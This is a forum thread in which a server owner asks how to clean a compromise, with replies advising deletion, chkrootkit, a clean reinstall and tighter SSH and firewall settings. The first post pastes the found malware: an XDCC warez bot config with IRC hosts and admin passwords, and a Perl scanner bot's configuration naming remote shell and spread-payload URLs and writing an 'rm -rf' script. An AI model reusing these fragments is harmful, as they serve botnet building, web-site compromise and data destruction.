My server is hacked, some IRC script...

[mladja04]

Hello,

I have big problem. I have server at ThePlanet and in last several days (maybe weeks) I sometime see in bandwith graph that link of 10mb/s is 100% used, see http://img144.imageshack.us/img144/9...gimgphpvi3.png
Than I see in var/tmp and find some bad code, maybe script in which are some hacker email addresses and some IPs. In some file I see and some IRC script and on net find that script is for IRC download or some similary.

This is example of one file

pidfile .s
logfile .f
logstats no
logrotate weekly
statefile .lib.css
xdcclistfile .lib.css~


connectionmethod direct
server 72.20.54.69 9000
server 194.169.192.55 9000
server 71.6.216.111 9000
server 72.20.54.69 31967
server 72.20.54.69 27397
server 72.20.54.69 48618
server 72.20.54.69 55493
server 71.6.216.111 65267

channel #ADD!KT!VE -plist 29 -key iNSOMNiA
channel #ADD!KT-test -plist 60 -key PRiVATE

nickserv_pass thu64l1f3

user_nick [EU]-N3W
user_realname 14,1# 14,1ADD4!14KT4!14VE
user_modes +iB
loginname FAST
#usenatip 78.31.115.159


slotsmax 15
queuesize 30
maxtransfersperperson 2
maxqueueditemsperperson 3
respondtochannelxdcc
downloadhost *!*@*

#headline 8,1welcome to everyone

creditline 14,1ADD4!14KT4!14VE


adminpass zBOTEinWEdNwI
adminhost mdma!*@global-threat.us
adminhost elmer*!*@elmer.wabbits.us
adminhost CHR0NiC!*@addikt-help.us
adminhost CHRONiC!*@addikt-help.us
adminhost WEED!*@*.addikt-help.us

uploadhost *!*@dean*.EsylumWarez.Net
uploadhost *!*@bobby811.EsylumWarez.Net
uploadhost mdma!*@global-threat.us
uploadhost elmer*!*@elmer.wabbits.us
uploadhost CHR0NiC*!*@addikt-help.us
uploadhost CHRONiC*!*@addikt-help.us
uploadhost WEED!*@*.addikt-help.us
uploadhost [EU]*!*@*
uploadhost [US]*!*@*
uploadhost [DiSTRO]*!*@*
uploadhost [KR]*!*@*

uploaddir /var/tmp/.lib
filedir /var/tmp/.lib
notifytime 10
nomd5sum

Too and some other files, example begining of one:

#!/usr/bin/perl

################################################## ###################################
## ##
## ##
## 04/04/2008 ##
## Author : Osirys ##
## Team : Third Eye Security ##
## Ircd : 84.19.176.186 ##
## WebSite : ##
## Contact : osirys[at]live[dot]it ##
## ##
## ## IMPORTANT ## ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ##
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ##
## # SYSTEM MORE SECURE. ##
## ## ##
## ##
## Release: v5 Private ##
## I coded this tool only for fun , anyway it works well ! This is a Private ##
## Release, so if you have this Script, please, take care, and don't give it ##
## anyone ! Thank you. ##
## It's a IrcBot. So, after connecting on your Ircd, you can scan for RFI, ##
## LFI, SQL Injection on sites using dorks. ##
## Anyway, u may know, that this one is the better bot ever created ! ##
## Be happy ! ##
## ##
## Features: ##
## [+]Sql Injection Scanner ##
## [+]Remote File Inclusion Scanner ##
## [+]Local File Inclusion Scanner ##
## [+]Integrated Shell, so you can execute commands on the server ##
## [+]Security Mode to protect "dangerous" functions ##
## [+]Spread Mode, to activate or disable Spread Function ##
## [+]Bypass Engines ON: Google, Yahoo ##
## !: To "bypass" these engines, the Scanner just looks for websites on other ##
## engines that use the same bots than the main ones ##
## ##
## ##
################################################## ###################################



### !!_/ PRIVATE

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

################################################## #####
## CONFIGURATION //
################################################## #####


my $id = "http://rawcraft.info/spread.txt??"; #Your RFI Response
my $shell = "http://r99.li/r57.txt??"; #Shell printed on the Vulnerable Site
my $ircd = "irc.indoirc.net";
my $port = "6667";
my $chan1 = "#fntsze.biz"; #Chan for Scan
my $chan2 = ""; #bot will be printed here too
my $nick="fntsze[".int(rand(1000))."]"; # Scanner Nickname
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "http://rawcraft.info/t.txt???";

my $spreadACT = 1; #0 ->disabled, 1 ->enabled
my $securityACT = 1; #0 ->disabled, 1 ->enabled

my $killpwd = "****off"; #Password to Kill the Bot
my $chidpwd = "****off"; #Password to change the RFI Response
my $cmdpwd = "****off"; #Password to execute commands on the server
my $secpwd = "****off";
my $spreadpwd = "****off";

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;


################################################## #####
## END OF CONFIGURATION //
################################################## #####

open( $f1le, ">", "rm.txt" );
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
close $f1le;
etc...

Do anybody have experience with this, how I to clean my server?

Thank you very much, Mladen

[mladja04]

Uf, I mistake forum category, please move it into security forum.


One friend tell me that i have IRC bot into my server, but didnt tell me how to disable and remove it. It is perl script.

Can you tell me how to do this?

[Ben Cotton]

There are three things you need to do:

1. Eliminate the problem
2. Prevent the problem
3. Resume operations

To do part 1, the easiest way is to just delete the files. The trick here is finding all the files that need to be deleted. You should probably run chkrootkit (chkrootkit -- locally checks for signs of a rootkit) as well.

For part 2, you need to figure out how this happened in the first place. Did you or another user download the code? Do you have the latest patches for your OS and applications installed? Are you using a firewall? Once you've figured out how this IRC bot got installed, you can prevent it from happening in the future.

For part 3, if it's just a simple IRC bot, there's not much you need to do. However, it is hard to be sure if other things may have been changed as well (for example, the root password, firewall settings, etc). Honestly, your best bet is to find a backup from before this happened, and re-install.

[smolloy]

This is indeed an IRC bot, but Ben Cotton's advice is good.

Eliminating this one problem is easy -- you can just delete the files -- but you have a bigger problem on your hands. Someone nasty knows how to get into and operate your server. If you don't fix this problem, then they'll simply reinstall their bot.

In this case my advice is always the same (and the same as Ben's). Clean reinstall.

Hopefully you have some backups from before your system was compromised.

[xDiLLoNiZGoD]

That is not a ircbot its a script for a UNIX|Scanner
its for scanning for sites to "infect" with a unix bot for DDoS Attacks.. wich is used for hitting off websites and or a normal connection.. if you do this any type of DDoS attacking i would NOT be posting a scanner showing you have tools like this even if you didnt add it to your server .. wich thats kinda odd bc it can only be added from the root user. using SSH. you might wanna remove it from this site showing you have it on your server.. bc it pretty much makes your irc a Botnet. and you showing others you have a botnet pretty much.

[Rubberman]

Whatever you do, when you reimage your system, or clean it out, make sure you remove all unknown user accounts and change the password on all of the remaining ones. Then restrict SSH access, or disable it altogether. Also, configure your firewall more robustly. If you can, you could install SElinux to have a more secure foundation system.